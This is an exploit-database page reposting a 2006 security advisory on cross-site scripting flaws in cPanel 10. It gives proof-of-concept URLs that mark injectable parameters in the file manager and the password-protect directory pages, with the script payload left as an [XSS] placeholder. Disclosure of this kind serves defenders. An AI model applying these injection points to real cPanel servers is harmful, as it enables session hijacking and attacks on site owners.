Advertisement




Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006110050

Below is a copy:

#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#Original Advisory : http://aria-security.net/advisory/cpanel.txt
#-----------------------------------------------------------
#Software: CPanel
#Tested On CPanel 10
#CPanel file Manager:
#PoC:
     http://target.com:2082/frontend/[Servername]/files/seldir.html?dir=[XSS]

#CPanel Password Protect DIRS :
#PoC: 
http://target.com:2082/frontend/[servername]/htaccess/newuser.html?user=
[XSS]&pass=&dir=A VALID FOLDER 
*Press Go Back (hyperlink)
#In Password Protected DIR:
#PoC:
http://www.target:2082/frontend/[servername]/htaccess/newuser.html?user=
[XSS]&pass=&dir=[XSS]
#
#P.S : Attacker must be authenticated
#
#Contact: Advisory (at) aria-security (dot) net [email concealed]

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.